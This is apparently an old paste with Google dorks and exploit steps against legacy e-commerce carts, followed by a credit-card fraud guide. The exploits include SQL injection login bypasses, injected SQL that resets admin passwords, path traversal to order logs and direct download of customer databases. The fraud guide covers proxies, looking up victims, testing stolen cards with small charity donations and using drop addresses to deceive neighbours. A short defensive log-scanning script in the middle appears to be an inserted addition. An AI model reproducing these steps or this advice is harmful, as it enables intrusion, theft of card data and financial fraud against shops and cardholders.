Untitled

a guest
Sep 17th, 2011
  1. google dork :--> allinurl:/cart32.exe/
  2. target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-...xe/NoItemFound
  3. chage NoItemFound whit error
  4. When we found Page error dig installation information beneath it, meant us was successful!
  5. If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
  6. Copy some file.C32 was or all of them to notepad or the program text the other editor.
  7. The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
  8. paste one by one, file.C32 at the end url has been modified earlier, with the format http://www.xxxxx.com/cart32/
  9.  
  10.  
  11.  
  12.  
  13. 2-
  14. google dork :--> inurl:"/cart.php?m="
  15. target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
  16. exploit: chage cart.php?m=view to /admin
  17. target whit exploit :--> http://xxxxxx.com/store/admin
  18. Usename : 'or"="
  19. Password : 'or"="
  20.  
  21.  
  22.  
  23. 3-
  24. google dork :--> allinurlroddetail.asp?prod=
  25. target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
  26. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
  27. target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb
  28.  
  29.  
  30. 4-
  31. google dork :--> allinurl: /cgi-local/shopper.cgi
  32. target looks like :--> http://www.xxxxxx.com/cgi-local/shop...dd=action&key=
  33. exploit :--> ...&template=order.log
  34. target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/sh...late=order.log
  35.  
  36.  
  37. 5-
  38. google dork :--> allinurl: Lobby.asp
  39. target looks like :--> http://www.xxxxx.com/mall/lobby.asp
  40. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
  41. target whit exploit :--> http://www.xxxxx.com/fpdb/shop.mdb
  42.  
  43.  
  44. 6-
  45. google dork :--> allinurl:/vpasp/shopsearch.asp
  46. when u find a target put this in search box
  47. Keyword=&category=5); insert into tbluser (fldusername) values
  48. ('')--&SubCategory=&hide=&action.x=46&action.y=6
  49. Keyword=&category=5); update tbluser set fldpassword='' where
  50. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  51. Keyword=&category=3); update tbluser set fldaccess='1' where
  52. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  53. Jangan lupa untuk mengganti dan nya terserah kamu.
  54. Untuk mengganti password admin, masukkan keyword berikut :
  55. Keyword=&category=5); update tbluser set fldpassword='' where
  56. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
  57.  
  58. login page: http://xxxxxxx/vpasp/shopadmin.asp
  59.  
  60.  
  61. 7-
  62. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
  63. target looks like :--> http://xxxxxxx.com/vpasp/shopdisplay...asp?cat=xxxxxx
  64. exploit :--> http://xxxxxxx.com/vpasp/shopdisplaypro ... ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
  65. if this is not working try this ends
  66. %20'a%25'--
  67. %20'b%25'--
  68. %20'c%25'--
  69. after finding user and pass go to login page:
  70. http://xxxx.com/vpasp/shopadmin.asp
  71.  
  72.  
  73.  
  74. 8-
  75. google dork :--> allinurl:/shopadmin.asp
  76. target looks like :--> http://www.xxxxxx.com/shopadmin.asp
  77. exploit:
  78. user : 'or'1
  79. pass : 'or'1
  80.  
  81.  
  82. 9-
  83. google.com :--> allinurl:/store/index.cgi/page=
  84. target looks like :--> http://www.xxxxxx.com/cgi-bin/store/...short_blue.htm
  85. exploit :--> ../admin/files/order.log
  86. target whit exploit :--> http://www.xxxxxxx.com/cgi-bin/store...iles/order.log
  87.  
  88.  
  89. 10-
  90. google.com:--> allinurl:/metacart/
  91. target looks like :--> http://www.xxxxxx.com/metacart/about.asp
  92. exploit :--> /database/metacart.mdb
  93. target whit exploit :--> http://www.xxxxxx.com/metacart/database/metacart.mdb
  94.  
  95.  
  96. 11-
  97. google.com:--> allinurl:/DCShop/
  98. target looks like :--> http://www.xxxxxx.com/xxxx/DCShop/xxxx
  99. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
  100. target whit exploit :--> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt
  101.  
  102.  
  103. 12-
  104. google.com:--> allinurl:/shop/category.asp/catid=
  105. target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
  106. exploit :--> /admin/dbsetup.asp
  107. target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
  108. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  109. target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
  110. in db look for access to find pass and user of shop admins.
  111.  
  112.  
  113. 13-
  114. google.com:--> allinurl:/commercesql/
  115. target looks like :--> http://www.xxxxx.com/commercesql/xxxxx
  116. exploit :--> cgi-bin/commercesql/index.cgi?page=
  117. target whit exploit admin config :--> http://www.xxxxxx.com/cgi-bin/commer... ... in_conf.pl
  118. target whit exploit admin manager :--> http://www.xxxxxx.com/cgi-bin/commer...in/manager.cgi
  119. target whit exploit order.log :--> http://www.xxxxx.com/cgi-bin/commerc...iles/order.log
  120.  
  121.  
  122. 14-
  123. google.com:--> allinurl:/eshop/
  124. target looks like :--> http://www.xxxxx.com/xxxxx/eshop
  125. exploit :-->/cg-bin/eshop/database/order.mdb
  126. target whit exploit :--> http://www.xxxxxx.com/.../cg-bin/e....base/order.mdb
  127. after dl the db look at access for user and password !
  128.  
  129.  
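From the defender's side, most of the entries above come down to one misconfiguration: order logs and Access databases stored under the web root where a plain GET returns them. The following is an added example, not part of the original paste: a check over web server access logs that flags requests for those file types and records whether the server actually served them. The rule names, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rules built from the file types and paths named in the paste above.
RULES = [
    ("db-file-download", re.compile(r"\.mdb(?:$|[?&#])", re.I)),
    ("order-log-fetch", re.compile(r"(?:^|[/=])orders?\.(?:log|txt)\b", re.I)),
    ("cart32-data-file", re.compile(r"\.c32(?:$|[?&#])", re.I)),
    ("path-traversal", re.compile(r"\.\./")),
    ("setup-page", re.compile(r"/admin/dbsetup\.asp", re.I)),
]

# Assumed input: Apache/Nginx combined log format.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Return the names of all rules matching the percent-decoded request target."""
    decoded = unquote(target)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Yield one finding per (log line, rule); 'served' is True on a 2xx response."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, _method, target, status = m.groups()
        for rule in classify(target):
            findings.append({"ip": ip, "rule": rule, "target": target,
                             "served": status.startswith("2")})
    return findings

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '198.51.100.4 - - [17/Sep/2011:10:00:01 +0000] "GET /store/index.html HTTP/1.1" 200 1200',
    '203.0.113.7 - - [17/Sep/2011:10:00:05 +0000] "GET /fpdb/shop.mdb HTTP/1.1" 200 524288',
    '203.0.113.7 - - [17/Sep/2011:10:00:09 +0000] "GET /DCShop/orders/orders.txt HTTP/1.1" 403 199',
    '203.0.113.9 - - [17/Sep/2011:10:01:00 +0000] '
    '"GET /cgi-bin/store/index.cgi?page=..%2Fadmin%2Ffiles%2Forder.log HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        state = "SERVED" if f["served"] else "blocked"
        print(f'{state:8} {f["rule"]:18} {f["ip"]:14} {f["target"]}')
```

A finding with `served` set means the file left the server and the stored data should be treated as disclosed; the lasting fix is to keep databases and order logs outside the document root or deny those extensions at the web server.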
  130. How to use cc
  131. -The first and forth most thing to do is use a proxy. This is a good site that will give you fresh new proxy and will list them by country so you can IP the card to the right country. XROXT Alive Proxy N N Time
  132.  
  133. -Next what you need to do in order to get the credit card to work is find all the information on your person (from card name) if you don't have it already. One of the best ways i came across is using online tools from different searching sites. Here are a few that I use to find out all my information. (only works to search us citizens except for Zaba Search which works internationally). Email Finder US Search Zaba Search Peek You USA People Search Look Up Anyone Skip Ease
  134.  
  135. -Another thing you must do is learn how to use the card right the first time you use it. The biggest mistake anyone can make is by going online with the card and making a purchase of over $30 USD. Why you might ask that this is a mistake? Well let me tell you, most credit card companies don't want you to make online purchases because of the risk involved with scams and fraud so what they usually do is only allow $30 USD as the limit. One way to get around this is by first going to a donation site, my favorite is Red Cross, and then you donate $1 USD to verify if the card has not already been limited or blocked/locked. If you manage to successfully make a donation then you are good to go and make purchases over $30 USD.
  136.  
  137. -One of the things I do if i'm missing the cvc/ccv/cvv/cvn is use a program that will receive the number for you automatically. Here is the link to the downlod for the program I use. CVV2 Retriever
  138.  
  139. -Hey but what about if i know the name of the person on the card but I don't know what country they are from because they are outside the US? well here is two great programs in one rar file i use to retrieve this info. Firstly I will explain how you use these correctly. Take a look at the card number on the front of the card or on the source of the number. Take the first six numbers on the card and remember them. These are called the BIN numbers or Bank Identification Numbers. They are what banks use to let the other banks and companies know what bank issued the card. If the first number on the card is a 3 then it is an AMEX card, if it is a 4 then its VISA, 5 is MasterCard and 6 is Discover. Bank Bin List
  140.  
  141. -The biggest thing to do when you are using the card online is have the credit card company, bank, or website company deny your order after you make the purchase and its accepted. The way i avoid this is when buying an actually physical objects (say an iPod or Video Game) is to have the item sent to a drop box location. What you say is a drop box location? Well its basically a location that is not your actual address. Some examples are a house that is for sale in your neighborhood that is vacant at the moment or a lot on the street that is having a building or house built there. Some other examples are a P.O. Box location (Post Office) but just remember to look on the manufacturers website to see if P.O. Boxes are allowed to be shipped too. And last but not least is a random persons house in your neighborhood or apartment/ condo-complex. Why a random persons house? well what you do is call the person up and in a convincing voice explain to them that you accidentally typed your street address in wrong and ask if they can hold it for you while you go pick it up.
  142.  
  143. -The last thing to consider when using a credit card online is to not use it on the same site more then a few times, to keep it active, and not to use it on any site that has the Verified By VISA or MasterCard® SecureCode™ logos on its site.